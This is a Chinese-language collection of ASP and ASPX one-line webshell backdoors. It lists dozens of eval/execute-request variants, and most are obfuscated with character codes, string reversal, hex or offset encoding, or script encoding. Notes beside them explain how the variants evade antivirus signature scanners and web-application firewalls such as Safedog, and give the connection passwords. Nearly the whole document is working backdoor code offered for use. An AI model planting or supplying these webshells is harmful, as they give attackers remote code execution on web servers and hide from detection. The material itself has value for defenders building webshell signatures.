ASP一句话木马收集:
<%eval request("chopper")%>
<%execute request("chopper")%>
<%execute(request("chopper"))%>
<%ExecuteGlobal request("chopper")%>
<%Eval(Request(chr(35)))%>
<%dy=request("c")%><%Eval(dy)%>
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
<% if Request("c")<>"" then ExecuteGlobal request("c") end if %>
<%execute request("c")%><%'<% loop <%:%>
< %'<% loop <%:%><%execute request("a")%>
<script language=vbs runat=server>eval(request("c"))</script>
<script language=VBScript runat=server>execute request("#")</script>
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%execute(unescape("eval%20request%28%22aaa%22%29"))%>
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>
这段代码将"eval request(/*/z/*/)"逆序成")/*/z/*/(tseuqer lave", 以逃避特征码查杀, 当脚本被访问, 其代码会被动态的解码还原成原始的一句话后门. 当前90%以上的未知后门和变形后门都是使用此类动态解码技术
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"*",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>
密码 z
可以躲过雷客图的一句话木马:
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
<%
password=Request("class")
Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
%>
<%
password=Request("class")
Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
%>
简单的aspx免杀
<%@ Page Language="Jscript"%> <% var a = Request.Item["M"]; var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是这个地方 其他地方好像不会管 eval(a,b); Response.Write("Test"); %>
过狗一句话:
<% dim play ' ' '''''''''''''''''' ''''''''' play = request("#") %> Error <% execute(play) %>
<%@codepage=65000%> <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>
参考资料:
一些常见的webshell后门的特征码 https://zhuanlan.zhihu.com/p/22149072
有关一句话后门的收集与整理 http://book.51cto.com/art/201204/328741.htm
asp执行cmd实例 http://m.blog.csdn.net/woswod/article/details/63253494